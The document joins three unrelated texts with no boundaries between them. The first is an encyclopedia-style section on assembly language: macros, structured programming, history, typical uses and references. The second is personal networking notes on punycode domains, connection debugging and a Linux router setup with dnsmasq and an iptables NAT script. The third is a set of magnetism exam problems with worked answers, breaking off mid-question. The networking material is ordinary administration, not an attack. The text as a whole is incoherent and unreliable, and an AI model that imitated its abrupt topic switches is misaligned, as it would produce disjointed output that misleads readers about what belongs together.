Assembly languages, like most other computer languages, allow comments to be added to program source code that will be ignored during assembly. Judicious commenting is essential in assembly language programs, as the meaning and purpose of a sequence of binary machine instructions can be difficult to determine. The "raw" (uncommented) assembly language generated by compilers or disassemblers is quite difficult to read when changes must be made.
Many assemblers support predefined macros, and others support programmer-defined (and repeatedly re-definable) macros involving sequences of text lines in which variables and constants are embedded. The macro definition is most commonly[nb 6] a mixture of assembler statements, e.g., directives, symbolic machine instructions, and templates for assembler statements. This sequence of text lines may include opcodes or directives. Once a macro has been defined its name may be used in place of a mnemonic. When the assembler processes such a statement, it replaces the statement with the text lines associated with that macro, then processes them as if they existed in the source code file (including, in some assemblers, expansion of any macros existing in the replacement text). Macros in this sense date to IBM autocoders of the 1950s.[nb 7]
Macro assemblers typically have directives to, e.g., define macros, define variables, set variables to the result of an arithmetic, logical or string expression, iterate, conditionally generate code. Some of those directives may be restricted to use within a macro definition, e.g., MEXIT in HLASM, while others may be permitted within open code (outside macro definitions), e.g., AIF and COPY in HLASM.
In assembly language, the term "macro" represents a more comprehensive concept than it does in some other contexts, such as the pre-processor in the C programming language, where its #define directive typically is used to create short single line macros. Assembler macro instructions, like macros in PL/I and some other languages, can be lengthy "programs" by themselves, executed by interpretation by the assembler during assembly.
Since macros can have 'short' names but expand to several or indeed many lines of code, they can be used to make assembly language programs appear to be far shorter, requiring fewer lines of source code, as with higher level languages. They can also be used to add higher levels of structure to assembly programs, and optionally to introduce embedded debugging code via parameters and other similar features.
Macro assemblers often allow macros to take parameters. Some assemblers include quite sophisticated macro languages, incorporating such high-level language elements as optional parameters, symbolic variables, conditionals, string manipulation, and arithmetic operations, all usable during the execution of a given macro, and allowing macros to save context or exchange information. Thus a macro might generate numerous assembly language instructions or data definitions, based on the macro arguments. This could be used to generate record-style data structures or "unrolled" loops, for example, or could generate entire algorithms based on complex parameters. For instance, a "sort" macro could accept the specification of a complex sort key and generate code crafted for that specific key, not needing the run-time tests that would be required for a general procedure interpreting the specification. An organization using assembly language that has been heavily extended using such a macro suite can be considered to be working in a higher-level language since such programmers are not working with a computer's lowest-level conceptual elements. Underlining this point, macros were used to implement an early virtual machine in SNOBOL4 (1967), which was written in the SNOBOL Implementation Language (SIL), an assembly language for a virtual machine. The target machine would translate this to its native code using a macro assembler. This allowed a high degree of portability for the time.
Macros were used to customize large scale software systems for specific customers in the mainframe era and were also used by customer personnel to satisfy their employers' needs by making specific versions of manufacturer operating systems. This was done, for example, by systems programmers working with IBM's Conversational Monitor System / Virtual Machine (VM/CMS) and with IBM's "real time transaction processing" add-ons, Customer Information Control System CICS, and ACP/TPF, the airline/financial system that began in the 1970s and still runs many large computer reservation systems (CRS) and credit card systems today.
It is also possible to use solely the macro processing abilities of an assembler to generate code written in completely different languages, for example, to generate a version of a program in COBOL using a pure macro assembler program containing lines of COBOL code inside assembly time operators instructing the assembler to generate arbitrary code. IBM OS/360 uses macros to perform system generation. The user specifies options by coding a series of assembler macros. Assembling these macros generates a job stream to build the system, including job control language and utility control statements.
This is because, as was realized in the 1960s, the concept of "macro processing" is independent of the concept of "assembly": in modern terms, the former is closer to text processing than to generating object code. The concept of macro processing appeared, and appears, in the C programming language, which supports "preprocessor instructions" to set variables, and make conditional tests on their values. Unlike certain previous macro processors inside assemblers, the C preprocessor is not Turing-complete because it lacks the ability to either loop or "go to", the latter allowing programs to loop.
Despite the power of macro processing, it fell into disuse in many high level languages (major exceptions being C, C++ and PL/I) while remaining a perennial for assemblers.
Macro parameter substitution is strictly by name: at macro processing time, the value of a parameter is textually substituted for its name. The most famous class of bugs resulting was the use of a parameter that itself was an expression and not a simple name when the macro writer expected a name. In the macro:
foo:    macro   a
        load    a*b
the intention was that the caller would provide the name of a variable, and the "global" variable or constant b would be used to multiply "a". If foo is called with the parameter a-c, the macro expansion

        load a-c*b

occurs. Because multiplication binds more tightly than subtraction, this computes a-(c*b) rather than the intended (a-c)*b. To avoid any possible ambiguity, users of macro processors can parenthesize formal parameters inside macro definitions, or callers can parenthesize the input parameters.
Support for structured programming
Packages of macros have been written providing structured programming elements to encode execution flow. The earliest example of this approach was in the Concept-14 macro set, originally proposed by Harlan Mills (March 1970), and implemented by Marvin Kessler at IBM's Federal Systems Division, which provided IF/ELSE/ENDIF and similar control flow blocks for OS/360 assembler programs. This was a way to reduce or eliminate the use of GOTO operations in assembly code, one of the main factors causing spaghetti code in assembly language. This approach was widely accepted in the early 1980s (the latter days of large-scale assembly language use). IBM's High Level Assembler Toolkit includes such a macro package.
A curious design was A-Natural, a "stream-oriented" assembler for 8080/Z80 processors from Whitesmiths Ltd. (developers of the Unix-like Idris operating system, and what was reported to be the first commercial C compiler). The language was classified as an assembler because it worked with raw machine elements such as opcodes, registers, and memory references; but it incorporated an expression syntax to indicate execution order. Parentheses and other special symbols, along with block-oriented structured programming constructs, controlled the sequence of the generated instructions. A-Natural was built as the object language of a C compiler, rather than for hand-coding, but its logical syntax won some fans.
There has been little apparent demand for more sophisticated assemblers since the decline of large-scale assembly language development. In spite of that, they are still being developed and applied in cases where resource constraints or peculiarities in the target system's architecture prevent the effective use of higher-level languages.
Assemblers with a strong macro engine allow structured programming via macros, such as the switch macro provided with the Masm32 package (this code is a complete program):
include \masm32\include\masm32rt.inc    ; use the Masm32 library

.code
demomain:
  REPEAT 20
        switch rv(nrandom, 9)   ; generate a number between 0 and 8
        mov ecx, 7
        case 0
                print "case 0"
        case ecx                ; in contrast to most other programming languages,
                print "case 7"  ; the Masm32 switch allows "variable cases"
        case 1 .. 3
                .if eax==1
                        print "case 1"
                .elseif eax==2
                        print "case 2"
                .else
                        print "cases 1 to 3: other"
                .endif
        case 4, 6, 8
                print "cases 4, 6 or 8"
        default
                mov ebx, 19     ; print 20 stars
                .Repeat
                        print "*"
                        dec ebx
                .Until Sign?    ; loop until the sign flag is set
        endsw
        print chr$(13, 10)
  ENDM
exit

end demomain
Use of assembly language
Assembly languages were not available at the time when the stored-program computer was introduced. Kathleen Booth "is credited with inventing assembly language" based on theoretical work she began in 1947, while working on the ARC2 at Birkbeck, University of London following consultation by Andrew Booth (later her husband) with mathematician John von Neumann and physicist Herman Goldstine at the Institute for Advanced Study.
In late 1948, the Electronic Delay Storage Automatic Calculator (EDSAC) had an assembler (named "initial orders") integrated into its bootstrap program. It used one-letter mnemonics developed by David Wheeler, who is credited by the IEEE Computer Society as the creator of the first "assembler". Reports on the EDSAC introduced the term "assembly" for the process of combining fields into an instruction word. SOAP (Symbolic Optimal Assembly Program) was an assembly language for the IBM 650 computer written by Stan Poley in 1955.
Assembly languages eliminate much of the error-prone, tedious, and time-consuming first-generation programming needed with the earliest computers, freeing programmers from tedium such as remembering numeric codes and calculating addresses. They were once widely used for all sorts of programming. However, by the late 1950s, their use had largely been supplanted by higher-level languages, in the search for improved programming productivity. Today, assembly language is still used for direct hardware manipulation, access to specialized processor instructions, or to address critical performance issues. Typical uses are device drivers, low-level embedded systems, and real-time systems (see § Current usage).
Numerous programs have been written entirely in assembly language. The Burroughs B5000 (1961) was the first computer for which an operating system, the MCP, was not developed entirely in assembly language; it was written in Executive Systems Problem Oriented Language (ESPOL), an Algol dialect. Many commercial applications were written in assembly language as well, including a large amount of the IBM mainframe software written by large corporations. COBOL, FORTRAN and some PL/I eventually displaced much of this work, although a number of large organizations retained assembly-language application infrastructures well into the 1990s.
Assembly language has long been the primary development language for 8-bit home computers such as the Atari 8-bit family, Apple II, MSX, ZX Spectrum, and Commodore 64. Interpreted BASIC dialects on these systems offer insufficient execution speed and insufficient facilities to take full advantage of the available hardware. These systems have severe resource constraints, idiosyncratic memory and display architectures, and provide limited system services. There are also few high-level language compilers suitable for microcomputer use. Similarly, assembly language is the default choice for 8-bit consoles such as the Atari 2600 and Nintendo Entertainment System.
Key software for IBM PC compatibles was written in assembly language, such as MS-DOS, Turbo Pascal, and the Lotus 1-2-3 spreadsheet. As computer speed grew exponentially, assembly language became a tool for speeding up parts of programs, such as the rendering of Doom, rather than a dominant development language. In the 1990s, assembly language was used to get performance out of systems such as the Sega Saturn and as the primary language for arcade hardware based on the TMS34010 integrated CPU/GPU such as Mortal Kombat and NBA Jam.
There has been debate over the usefulness and performance of assembly language relative to high-level languages.
Although assembly language has specific niche uses where it is important (see below), there are other tools for optimization.
As of July 2017, the TIOBE index of programming language popularity ranks assembly language at 11, ahead of Visual Basic, for example. Assembler can be used to optimize for speed or optimize for size. In the case of speed optimization, modern optimizing compilers are claimed to render high-level languages into code that can run as fast as hand-written assembly, despite the counter-examples that can be found. The complexity of modern processors and memory sub-systems makes effective optimization increasingly difficult for compilers, as well as for assembly programmers. Moreover, increasing processor performance has meant that most CPUs sit idle most of the time, with delays caused by predictable bottlenecks such as cache misses, I/O operations and paging. This has made raw code execution speed a non-issue for many programmers.
There are some situations in which developers might choose to use assembly language:
- Writing code for systems with older processors that have limited high-level language options, such as the Atari 2600, Commodore 64, and graphing calculators. Programs for these computers of the 1970s and 1980s are often written in the context of demoscene or retrogaming subcultures.
- Code that must interact directly with the hardware, for example in device drivers and interrupt handlers.
- In an embedded processor or DSP, high-repetition interrupts require the fewest possible cycles per interrupt, such as an interrupt that occurs 1000 or 10000 times a second.
- Programs that need to use processor-specific instructions not implemented in a compiler. A common example is the bitwise rotation instruction at the core of many encryption algorithms, as well as querying the parity of a byte or the 4-bit carry of an addition.
- A stand-alone executable of compact size is required that must execute without recourse to the run-time components or libraries associated with a high-level language. Examples have included firmware for telephones, automobile fuel and ignition systems, air-conditioning control systems, security systems, and sensors.
- Programs with performance-sensitive inner loops, where assembly language provides optimization opportunities that are difficult to achieve in a high-level language. For example, linear algebra with BLAS or discrete cosine transformation (e.g. SIMD assembly version from x264).
- Programs that create vectorized functions for programs in higher-level languages such as C. In the higher-level language this is sometimes aided by compiler intrinsic functions which map directly to SIMD mnemonics, but nevertheless result in a one-to-one assembly conversion specific for the given vector processor.
- Real-time programs such as simulations, flight navigation systems, and medical equipment. For example, in a fly-by-wire system, telemetry must be interpreted and acted upon within strict time constraints. Such systems must eliminate sources of unpredictable delays, which may be created by (some) interpreted languages, automatic garbage collection, paging operations, or preemptive multitasking. However, some higher-level languages incorporate run-time components and operating system interfaces that can introduce such delays. Choosing assembly or lower level languages for such systems gives programmers greater visibility and control over processing details.
- Cryptographic algorithms that must always take strictly the same time to execute, preventing timing attacks.
- Video encoders and decoders such as rav1e (an encoder for AV1) and dav1d (the reference decoder for AV1) contain assembly to leverage AVX2 and ARM Neon instructions when available.
- Modifying and extending legacy code written for IBM mainframe computers.
- Situations where complete control over the environment is required, in extremely high-security situations where nothing can be taken for granted.
- Computer viruses, bootloaders, certain device drivers, or other items very close to the hardware or low-level operating system.
- Instruction set simulators for monitoring, tracing and debugging where additional overhead is kept to a minimum.
- Situations where no high-level language exists, on a new or specialized processor for which no cross compiler is available.
- Reverse-engineering and modifying program files such as:
- existing binaries that may or may not have originally been written in a high-level language, for example when trying to recreate programs for which source code is not available or has been lost, or cracking copy protection of proprietary software.
- Video games (also termed ROM hacking), which is possible via several methods. The most widely employed method is altering program code at the assembly language level.
Assembly language is still taught in most computer science and electronic engineering programs. Although few programmers today regularly work with assembly language as a tool, the underlying concepts remain important. Such fundamental topics as binary arithmetic, memory allocation, stack processing, character set encoding, interrupt processing, and compiler design would be hard to study in detail without a grasp of how a computer operates at the hardware level. Since a computer's behavior is fundamentally defined by its instruction set, the logical way to learn such concepts is to study an assembly language. Most modern computers have similar instruction sets. Therefore, studying a single assembly language is sufficient to learn the basic concepts, to recognize situations where the use of assembly language might be appropriate, and to see how efficient executable code can be created from high-level languages.
- Assembly language is typically used in a system's boot code, the low-level code that initializes and tests the system hardware prior to booting the operating system and is often stored in ROM. (The BIOS used on IBM-compatible PC systems and on CP/M is an example.)
- Assembly language is often used for low-level code, for instance for operating system kernels, which cannot rely on the availability of pre-existing system calls and must indeed implement them for the particular processor architecture on which the system will be running.
- Some compilers translate high-level languages into assembly first before fully compiling, allowing the assembly code to be viewed for debugging and optimization purposes.
- Some compilers for relatively low-level languages, such as Pascal or C, allow the programmer to embed assembly language directly in the source code (so called inline assembly). Programs using such facilities can then construct abstractions using different assembly language on each hardware platform. The system's portable code can then use these processor-specific components through a uniform interface.
- Assembly language is useful in reverse engineering. Many programs are distributed only in machine code form, which is straightforward to translate into assembly language by a disassembler, but more difficult to translate into a higher-level language through a decompiler. Tools such as the Interactive Disassembler make extensive use of disassembly for such a purpose. This technique is used by hackers to crack commercial software, and by competitors to produce software with similar results.
- Assembly language is used to enhance speed of execution, especially in early personal computers with limited processing power and RAM.
- Assemblers can be used to generate blocks of data, with no high-level language overhead, from formatted and commented source code, to be used by other code.
See also
- Comparison of assemblers
- Instruction set architecture
- Little man computer – an educational computer model with a base-10 assembly language
- Typed assembly language
Notes
- ^ Other than meta-assemblers
- ^ However, that does not mean that the assembler programs implementing those languages are universal.
- ^ "Used as a meta-assembler, it enables the user to design his own programming languages and to generate processors for such languages with a minimum of effort."
- ^ This is one of two redundant forms of this instruction that operate identically. The 8086 and several other CPUs from the late 1970s/early 1980s have redundancies in their instruction sets, because it was simpler for engineers to design these CPUs (to fit on silicon chips of limited sizes) with the redundant codes than to eliminate them (see don't-care terms). Each assembler will typically generate only one of two or more redundant instruction encodings, but a disassembler will usually recognize any of them.
- ^ AMD manufactured second-source Intel 8086, 8088, and 80286 CPUs, and perhaps 8080A and/or 8085A CPUs, under license from Intel, but starting with the 80386, Intel refused to share their x86 CPU designs with anyone—AMD sued about this for breach of contract—and AMD designed, made, and sold 32-bit and 64-bit x86-family CPUs without Intel's help or endorsement.
- ^ In 7070 Autocoder, a macro definition is a 7070 macro generator program that the assembler calls; Autocoder provides special macros for macro generators to use.
- ^ "The following minor restriction or limitation is in effect with regard to the use of 1401 Autocoder when coding macro instructions ..."
References
- ^ a b "Assembler language". High Level Assembler for z/OS & z/VM & z/VSE Language Reference Version 1 Release 6. IBM. 2014. SC26-4940-06.
- ^ "Assembly: Review" (PDF). Computer Science and Engineering. College of Engineering, Ohio State University. 2016. Archived (PDF) from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Archer, Benjamin (November 2016). Assembly Language For Students. North Charleston, South Carolina, USA: CreateSpace Independent Publishing. ISBN 978-1-5403-7071-6.
Assembly language may also be called symbolic machine code.
- ^ Streib, James T. (2020). "Guide to Assembly Language". Undergraduate Topics in Computer Science. Cham: Springer International Publishing. doi:10.1007/978-3-030-35639-2. ISBN 978-3-030-35638-5. ISSN 1863-7310. S2CID 195930813.
Programming in assembly language has the same benefits as programming in machine language, except it is easier.
- ^ Saxon, James A.; Plette, William S. (1962). Programming the IBM 1401, a self-instructional programmed manual. Englewood Cliffs, New Jersey, USA: Prentice-Hall. LCCN 62-20615. (NB. Use of the term assembly program.)
- ^ Kornelis, A. F. (2010). "High Level Assembler – Opcodes overview, Assembler Directives". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ "Macro instructions". High Level Assembler for z/OS & z/VM & z/VSE Language Reference Version 1 Release 6. IBM. 2014. SC26-4940-06.
- ^ Booth, Andrew D; Britten, Kathleen HV (1947). Coding for A.R.C. (PDF). Institute for Advanced Study, Princeton. Retrieved 2022-11-04.
- ^ Wilkes, Maurice Vincent; Wheeler, David John; Gill, Stanley J. (1951). The preparation of programs for an electronic digital computer (Reprint 1982 ed.). Tomash Publishers. ISBN 978-0-93822803-5. OCLC 313593586.
- ^ Fairhead, Harry (2017-11-16). "History of Computer Languages - The Classical Decade, 1950s". I Programmer. Archived from the original on 2020-01-02. Retrieved 2020-03-06.
- ^ "How do assembly languages depend on operating systems?". Stack Exchange. Stack Exchange Inc. 2011-07-28. Archived from the original on 2020-03-24. Retrieved 2020-03-24. (NB. System calls often vary, e.g. for MVS vs. VSE vs. VM/CMS; the binary/executable formats for different operating systems may also vary.)
- ^ Austerlitz, Howard (2003). "Computer Programming Languages". Data Acquisition Techniques Using PCs. Elsevier. pp. 326–360. doi:10.1016/b978-012068377-2/50013-9. ISBN 9780120683772.
Assembly language (or Assembler) is a compiled, low-level computer language. It is processor-dependent since it basically translates the Assembler's mnemonics directly into the commands a particular CPU understands, on a one-to-one basis. These Assembler mnemonics are the instruction set for that processor.
- ^ Carnes, Beau (2022-04-27). "Learn Assembly Language Programming with ARM". freeCodeCamp.org. Retrieved 2022-06-21.
Assembly language is often specific to a particular computer architecture so there are multiple types of assembly languages. ARM is an increasingly popular assembly language.
- ^ Brooks, Frederick P. (1986). "No Silver Bullet—Essence and Accident in Software Engineering". Proceedings of the IFIP Tenth World Computing Conference: 1069–1076.
- ^ Anguiano, Ricardo. "linux kernel mainline 4.9 sloccount.txt". Gist. Retrieved 2022-05-04.
- ^ Daintith, John, ed. (2019). "meta-assembler". A Dictionary of Computing. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Xerox Data Systems (Oct 1975). Xerox Meta-Symbol Sigma 5-9 Computers Language and Operations Reference Manual (PDF). p. vi. Archived (PDF) from the original on 2022-10-09. Retrieved 2020-06-07.
- ^ Sperry Univac Computer Systems (1977). Sperry Univac Computer Systems Meta-Assembler (MASM) Programmer Reference (PDF). Archived (PDF) from the original on 2022-10-09. Retrieved 2020-06-07.
- ^ "How to Use Inline Assembly Language in C Code". gnu.org. Retrieved 2020-11-05.
- ^ a b c d Salomon, David (February 1993) . Written at California State University, Northridge, California, USA. Chivers, Ian D. (ed.). Assemblers and Loaders (PDF). Ellis Horwood Series In Computers And Their Applications (1 ed.). Chicester, West Sussex, UK: Ellis Horwood Limited / Simon & Schuster International Group. pp. 7, 237–238. ISBN 0-13-052564-2. Archived (PDF) from the original on 2020-03-23. Retrieved 2008-10-01. (xiv+294+4 pages)
- ^ Finlayson, Ian; Davis, Brandon; Gavin, Peter; Uh, Gang-Ryung; Whalley, David; Själander, Magnus; Tyson, Gary (2013). "Improving processor efficiency by statically pipelining instructions". Proceedings of the 14th ACM SIGPLAN/SIGBED conference on Languages, compilers and tools for embedded systems. pp. 33–44. doi:10.1145/2465554.2465559. ISBN 9781450320856. S2CID 8015812.
- ^ Beck, Leland L. (1996). "2". System Software: An Introduction to Systems Programming. Addison Wesley.
- ^ a b Hyde, Randall (September 2003) [1996-09-30]. "Foreword ("Why would anyone learn this stuff?") / Chapter 12 – Classes and Objects". The Art of Assembly Language (2 ed.). No Starch Press. ISBN 1-886411-97-2. Archived from the original on 2010-05-06. Retrieved 2020-06-22. Errata: (928 pages)
- ^ a b c d Intel Architecture Software Developer's Manual, Volume 2: Instruction Set Reference (PDF). Vol. 2. Intel Corporation. 1999. Archived from the original (PDF) on 2009-06-11. Retrieved 2010-11-18.
- ^ Ferrari, Adam; Batson, Alan; Lack, Mike; Jones, Anita (2018-11-19) [Spring 2006]. Evans, David (ed.). "x86 Assembly Guide". Computer Science CS216: Program and Data Representation. University of Virginia. Archived from the original on 2020-03-24. Retrieved 2010-11-18.
- ^ "The SPARC Architecture Manual, Version 8" (PDF). SPARC International. 1992. Archived from the original (PDF) on 2011-12-10. Retrieved 2011-12-10.
- ^ Moxham, James (1996). "ZINT Z80 Interpreter". Z80 Op Codes for ZINT. Archived from the original on 2020-03-24. Retrieved 2013-07-21.
- ^ Hyde, Randall. "Chapter 8. MASM: Directives & Pseudo-Opcodes" (PDF). The Art of Computer Programming. Archived (PDF) from the original on 2020-03-24. Retrieved 2011-03-19.
- ^ Users of 1401 Autocoder. Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Griswold, Ralph E. (1972). "Chapter 1". The Macro Implementation of SNOBOL4. San Francisco, California, USA: W. H. Freeman and Company. ISBN 0-7167-0447-1.
- ^ "Macros (C/C++), MSDN Library for Visual Studio 2008". Microsoft Corp. 2012-11-16. Archived from the original on 2020-03-24. Retrieved 2010-06-22.
- ^ Kessler, Marvin M. (1970-12-18). "*Concept* Report 14 - Implementation of Macros To Permit Structured Programming in OS/360". MVS Software: Concept 14 Macros. Gaithersburg, Maryland, USA: International Business Machines Corporation. Archived from the original on 2020-03-24. Retrieved 2009-05-25.
- ^ "High Level Assembler Toolkit Feature Increases Programmer Productivity". IBM. 1995-12-12. Announcement Letter Number: A95-1432.
- ^ Whitesmiths Ltd (1980-07-15). A-Natural Language Reference Manual.
- ^ "assembly language: Definition and Much More from Answers.com". answers.com. Archived from the original on 2009-06-08. Retrieved 2008-06-19.
- ^ Provinciano, Brian (2005-04-17). "NESHLA: The High Level, Open Source, 6502 Assembler for the Nintendo Entertainment System". Archived from the original on 2020-03-24. Retrieved 2020-03-24.
- ^ Dufresne, Steven (2018-08-21). "Kathleen Booth: Assembling Early Computers While Inventing Assembly". Archived from the original on 2020-03-24. Retrieved 2019-02-10.
- ^ a b Booth, Andrew Donald; Britten, Kathleen Hylda Valerie (September 1947) [August 1947]. General considerations in the design of an all purpose electronic digital computer (PDF) (2 ed.). The Institute for Advanced Study, Princeton, New Jersey, USA: Birkbeck College, London. Archived (PDF) from the original on 2020-03-24. Retrieved 2019-02-10.
The non-original ideas, contained in the following text, have been derived from a number of sources, ... It is felt, however, that acknowledgement should be made to Prof. John von Neumann and to Dr. Herman Goldstein for many fruitful discussions ...
Parts of this article are inspired by the "Introduction to Networking - What Do All These Little Things Do" series. Kudos to Eli the Computer Guy.
A domain name can contain:
- a subset of ASCII characters: most domains
- a subset of Unicode text characters: .net and other uncommon domains
- some emoji characters: only certain TLDs (.ml was free to claim, but there is no way to get it now; you can still get some emoji domain names Here)
Note that for most browsers, only ASCII characters are guaranteed to display normally; others are converted to punycode. Here are the 13 rules the Chrome browser uses to decide whether to show punycode or Unicode (in summary, these are allowed and these are not allowed.). And Here is Firefox's policy.
When a domain is converted to punycode, you will see an `xn--` prefix in the address bar.
Some Greek characters can display normally on Chrome, and most of them (except for \theta) can be combined with numbers while still showing as Unicode; \theta combined with a number will be converted to punycode on Chrome.
https://2π.com/ is a domain that leverages this property of Chrome.
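You can compute the punycode (ASCII) form of an internationalized domain with Python's built-in `idna` codec; a minimal sketch (the example domain `bücher.de` is just an illustration):

```python
# Convert an internationalized domain name to its punycode (ACE) form.
# Python's built-in "idna" codec encodes label by label, prefixing each
# non-ASCII label with "xn--" -- the same form browsers show in the bar.
unicode_domain = "bücher.de"
ascii_domain = unicode_domain.encode("idna").decode("ascii")
print(ascii_domain)  # -> xn--bcher-kva.de

# Pure-ASCII domains pass through unchanged.
print("example.com".encode("idna").decode("ascii"))  # -> example.com
```

This is roughly what a browser does before issuing the DNS query, since DNS itself only carries ASCII labels.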
Many things might go wrong with your internet connection, especially for someone like me who manually changes internet settings in
`/etc/resolv.conf`, iptables, or some places that I don't even remember.
The best way to debug is to check, in order, whether:
- `ping [url]` works: if so, at least the remote machine is online and DNS resolves correctly
- `ping [ip]` works
- `wget [url]` works: if so, then everything should be fine; otherwise the TCP connection isn't working
- `wget [ip]` works
- `nslookup` returns correctly
- `ip route get [ip]` returns a sensible route, and `ip route` shows a sane routing table
- boot up a fresh machine and compare its routing table with yours; if a VPN is connected, you should get a `ppp0` entry in your routing table after a while
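The DNS-versus-TCP distinction behind this checklist can be sketched in a few lines of Python; the function name `diagnose` is mine, not from any library:

```python
import socket

def diagnose(host, port=80, timeout=3):
    """Rough analogue of the ping/wget checklist: first resolve the
    name (the DNS step), then attempt a TCP connection (the wget step)."""
    try:
        socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror:
        return "dns"   # name does not resolve: a DNS problem
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "ok"  # TCP handshake succeeded
    except OSError:
        return "tcp"   # name resolved, but the TCP connection failed
```

`diagnose("example.com")` returns "ok" when everything works, "dns" when resolution fails, and "tcp" when the host resolves but cannot be reached.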
The way you connect to the internet at your home is through the following chain of devices:
[Device#1, Device#2, ...] -> (Wireless Access Point) -> Switch -> Firewall -> Router -> Modem -> ISP -> Rest of Internet
Note that some devices above are logically multiple devices but sometimes physically one device. The product you buy to access the Internet bundles all of these devices.
Modem: translates analog signals to digital signals.
A modem can receive signals from:
DSL (ADSL, SDSL, VDSL)
Fiber Optic (FIOS)
Point-to-point (P2P) Wireless
Wireless (3G, 4G, 5G)
IEEE 802.11 (a, b, g, n):
802.11a: nobody uses it; not compatible with any other standard
802.11b: slow, old
802.11g: faster, more stable; the common standard
802.11n: newer; allows a larger area, is faster, and is built for real-time communication
Hub: obsolete; splits the signal equally among ports.
Switch:
unmanaged switch: hardcoded, no configuration
managed switch: can program switch
A switch needs to match the speed of your internet connection. Usually each building has one big switch.
Patch Panel: a layer between the switch and the exit points, so that we can have a lot more exit points and can move connections around when they are not used.
Wireless Access Point: provides the WiFi signal
Internet Service Provider (ISP): the centralized institution that gets you internet access
enterprise class: immediate response to issues
residential class: <5 days response to issues
Why not dynamic IP:
Email filters block emails sent from dynamic IP addresses
The IP address changes, so you can't set up a server
Service Level Agreement (SLA): the ISP guarantees that I get a certain speed 99% of the time. A legal agreement to prevent false advertising. However, residential class seldom has such an SLA. Advertised speed is not an SLA.
In Linux, DNS is controlled by resolvconf (check its status with `systemctl status resolvconf.service`).
You change `/etc/network/interfaces`.
To see the changes, you must reboot the server.
For more detail, check this youtube video.
For Windows: Follow this guide.
For Linux: Follow this guide.
By default, packet forwarding is disabled in Linux systems. To enable it, open the file
`/etc/sysctl.conf` in your favorite editor and add the line
`net.ipv4.ip_forward = 1`. Suppose machine M's kernel receives a packet whose destination IP address indicates it's not meant for M. What will it do? When
`ip_forward=0`, it thinks: "I don't know why this got sent to me and I don't really care. To the trash it goes!" With
`ip_forward=1`: "Hmm, this is not for me. But I know where the recipient is, so I'll just resend it with the correct MAC address."
$ sudo vi /etc/sysctl.conf # Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1
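Editing sysctl.conf only takes effect once the settings are reloaded; a quick sketch for checking (and, as root, applying) the value at runtime, assuming a Linux system with procfs mounted:

```shell
# Check whether IPv4 forwarding is currently enabled (0 = off, 1 = on).
cat /proc/sys/net/ipv4/ip_forward

# Apply the setting immediately, without a reboot (requires root):
# sudo sysctl -w net.ipv4.ip_forward=1
```

`sudo sysctl -p` reloads `/etc/sysctl.conf` so the edit takes effect without rebooting.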
Install dnsmasq to serve IP addresses to the 192.168.2.0 network.
In the rest of this tutorial we will use enp1s0 for the Ethernet network device and wlp2s0 for the WiFi for the first computer. These may be different in your computer and you would need to replace these with the values obtained by running the ip link command in the steps given below.
Next we need to configure dnsmasq. Configuring dnsmasq by editing the
$ sudo vi /etc/dnsmasq.conf # Add the lines, interface=enp1s0 dhcp-range=192.168.2.100,192.168.2.200,24h
The next step is to configure the `enp1s0` interface. This is done by editing `/etc/network/interfaces`:
$ sudo vi /etc/network/interfaces auto lo iface lo inet loopback # Add the lines, auto enp1s0 iface enp1s0 inet static address 192.168.2.1 network 192.168.2.0 netmask 255.255.255.0 broadcast 192.168.2.255
Next, create the file,
/etc/network/if-pre-up.d/router_firewall, using a text editor with superuser privileges (e.g.,
sudo vi /etc/network/if-pre-up.d/router_firewall), and with contents as given below. As mentioned above, this file uses enp1s0 for Ethernet NIC device file and wlp2s0 for the WiFi device file, which you might need to change if the values on your computer are different.
#!/bin/bash # # script for source Network Address Translation using iptables # iptables -F iptables -t nat -F iptables -X iptables -N val_input iptables -N val_output # allow packets with NEW, ESTABLISHED and RELATED states iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i lo -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o lo -j RETURN iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i enp1s0 -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o enp1s0 -j RETURN iptables -A val_input -m state --state NEW,ESTABLISHED,RELATED -i wlp2s0 -j RETURN iptables -A val_output -m state --state NEW,ESTABLISHED,RELATED -o wlp2s0 -j RETURN iptables -A val_input -j DROP iptables -A val_output -j DROP iptables -A INPUT -p tcp -j val_input iptables -A OUTPUT -p tcp -j val_output iptables -t nat -A POSTROUTING -o wlp2s0 -j MASQUERADE
The iptables commands are described in the iptables tutorial. Next, make the file executable:
sudo chmod +x /etc/network/if-pre-up.d/router_firewall
The space inside a straight current-carrying solenoid is filled with a magnetic material having magnetic susceptibility equal to $$1.2 \times 10^{-5}$$. What is the fractional increase in the magnetic field inside the solenoid with respect to air as the medium inside the solenoid?
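For reference, a worked sketch: with the magnetic material inside, $$B = \mu_0(1 + \chi_m)nI$$, while with air $$B_0 \approx \mu_0 nI$$, so the fractional increase is

$$\frac{B - B_0}{B_0} = \chi_m = 1.2 \times 10^{-5}$$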
Two parallel, long wires are kept 0.20 m apart in vacuum, each carrying a current of x A in the same direction. If the force of attraction per meter of each wire is $$2 \times 10^{-6}$$ N, then the value of x is approximately :
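For reference, a worked sketch using the force per unit length between parallel currents:

$$\frac{F}{l} = \frac{\mu_0 x^2}{2\pi d} = 2 \times 10^{-6} \;\Rightarrow\; x^2 = \frac{(2 \times 10^{-6})(2\pi)(0.20)}{4\pi \times 10^{-7}} = 2 \;\Rightarrow\; x = \sqrt{2} \approx 1.4 \text{ A}$$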
A coil is placed in a time varying magnetic field. If the number of turns in the coil were to be halved and the radius of wire doubled, the electrical power dissipated due to the current induced in the coil would be :
(Assume the coil to be short circuited.)
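For reference, one way to reason about it: the induced EMF scales with the number of turns, $$\varepsilon \propto N$$, while the coil resistance scales as $$R \propto N/a^2$$ for wire radius $$a$$. Halving $$N$$ and doubling $$a$$ gives $$\varepsilon' = \varepsilon/2$$ and $$R' = R/8$$, so

$$P' = \frac{(\varepsilon/2)^2}{R/8} = 2\,\frac{\varepsilon^2}{R} = 2P$$

i.e., the dissipated power doubles.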
An infinitely long hollow conducting cylinder with radius R carries a uniform current along its surface.
